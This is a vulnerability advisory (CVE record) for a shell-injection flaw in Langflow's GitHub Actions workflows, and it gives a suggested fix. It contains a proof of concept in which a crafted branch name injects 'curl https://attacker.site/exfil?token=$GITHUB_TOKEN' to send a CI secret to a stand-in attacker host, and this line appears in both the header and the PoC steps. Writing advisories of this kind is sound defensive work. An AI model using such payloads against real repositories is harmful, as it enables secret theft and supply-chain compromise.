CVE-2026-33475

# Vulnerable Workflow Snippet steps: - name: Test run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" # Attack Scenario (Branch Name) # Branch name: "normal_name && curl https://attacker.com/exfil?token=$GITHUB_TOKEN" # When executed, the shell runs: # validate_branch_name "normal_name" # curl https://attacker.com/exfil?token=$GITHUB_TOKEN

{"cve": {"id": "CVE-2026-33475", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:04.030", "lastModified": "2026-03-24T19:13:01.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\n\n---\n\n### Details\n\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\n\n```yaml\nrun: |\n validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nOr:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\n\n---\n\n### PoC\n\n1. **Fork** the Langflow repository\n2. **Create a new branch** with the name:\n ```bash\n injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n ```\n3. **Open a Pull Request** to the main branch from the new branch\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\n5. The `run:` step containing:\n ```yaml\n echo \"Branch: ${{ github.head_ref }}\"\n ```\n Will execute:\n ```bash\n echo \"Branch: injection-test\"\n curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n ```\n\n6. The attacker receives the CI secret via the exfil URL.\n\n---\n\n### Impact\n\n- **Type:** Shell Injection / Remote Code Execution in CI\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\n\n---\n\n### Suggested Fix\n\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\n\n```yaml\nenv:\n BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\n\n---\n\n### Affected Files (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"}, {"lang": "es", "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyección de shell remota no autenticada existe en múltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versión 1.9.0. La interpolación no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a través de un nombre de rama o título de solicitud de extracción malicioso. Esto puede llevar a la exfiltración de secretos (por ejemplo, `GITHUB_TOKEN`), manipulación de infraestructura o compromiso de la cadena de suministro durante la ejecución de CI/CD. La versión 1.9.0 parchea la vulnerabilidad.\n\n---\n\n### Detalles\n\nVarios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como:\n\n```yaml\nrun: |\n validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nO:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nDado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolación directa sin el entrecomillado o saneamiento adecuados conduce a la inyección de comandos de shell.\n\n---\n\n### PoC\n\n1. Bifurcar el repositorio de Langflow\n2. Crear una nueva rama con el nombre:\n ```bash\n injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n ```\n3. Abrir una solicitud de extracción a la rama principal desde la nueva rama\n4. GitHub Actions ejecutará el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`)\n5. El paso `run:` que contiene:\n ```yaml\n echo \" ... (truncated)